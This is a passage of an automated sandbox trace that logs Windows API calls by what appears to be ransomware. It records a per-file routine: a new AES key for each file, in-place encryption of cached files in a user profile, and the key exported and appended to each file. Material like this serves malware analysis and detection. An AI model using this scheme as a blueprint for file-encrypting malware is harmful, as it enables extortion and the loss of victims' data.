nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.155] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.155] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.155] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.156] CloseHandle (hObject=0x198) returned 1 [0147.177] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.181] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.181] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.181] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.181] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", dwFileAttributes=0x80) returned 1 [0147.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.182] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=492) returned 1 [0147.182] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=492) returned 1 [0147.182] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.182] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.183] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.183] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.183] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.183] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.183] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1ec, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1ec, lpOverlapped=0x0) returned 1 [0147.183] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.183] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1ec, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1f0) returned 1 [0147.183] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.183] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1f0, lpOverlapped=0x0) returned 1 [0147.183] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.183] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.183] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.183] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.184] CloseHandle (hObject=0x198) returned 1 [0147.215] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.219] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.219] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.219] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.219] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.219] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", dwFileAttributes=0x80) returned 1 [0147.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.220] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=416) returned 1 [0147.220] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=416) returned 1 [0147.220] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.220] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.220] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.220] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.220] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.221] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.221] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.221] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.221] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0147.221] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.221] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0147.221] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.221] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.221] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.221] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.221] CloseHandle (hObject=0x198) returned 1 [0147.239] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.243] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.243] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.243] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.243] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", dwFileAttributes=0x80) returned 1 [0147.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.244] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=416) returned 1 [0147.244] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=416) returned 1 [0147.244] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.244] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.245] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.245] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.245] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.245] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.245] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.245] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.245] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0147.245] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.245] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0147.245] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.245] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.245] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.245] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.245] CloseHandle (hObject=0x198) returned 1 [0147.286] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.290] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.290] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.291] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.291] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.291] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", dwFileAttributes=0x80) returned 1 [0147.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.292] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=516) returned 1 [0147.292] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=516) returned 1 [0147.292] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.292] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.293] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.293] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.293] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.293] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.293] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x204, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x204, lpOverlapped=0x0) returned 1 [0147.293] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.293] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x204, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x210) returned 1 [0147.293] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.293] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x210, lpOverlapped=0x0) returned 1 [0147.294] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.294] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.294] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.294] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.294] CloseHandle (hObject=0x198) returned 1 [0147.341] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.345] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.345] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.345] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.345] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.345] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", dwFileAttributes=0x80) returned 1 [0147.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.346] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=516) returned 1 [0147.346] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=516) returned 1 [0147.346] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.346] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.348] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.348] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.349] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.349] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.349] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x204, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x204, lpOverlapped=0x0) returned 1 [0147.349] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.349] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x204, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x210) returned 1 [0147.349] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.349] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x210, lpOverlapped=0x0) returned 1 [0147.349] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.349] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.349] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.349] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.349] CloseHandle (hObject=0x198) returned 1 [0147.368] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.377] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.377] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.377] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.377] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", dwFileAttributes=0x80) returned 1 [0147.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.378] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=402) returned 1 [0147.378] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=402) returned 1 [0147.378] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 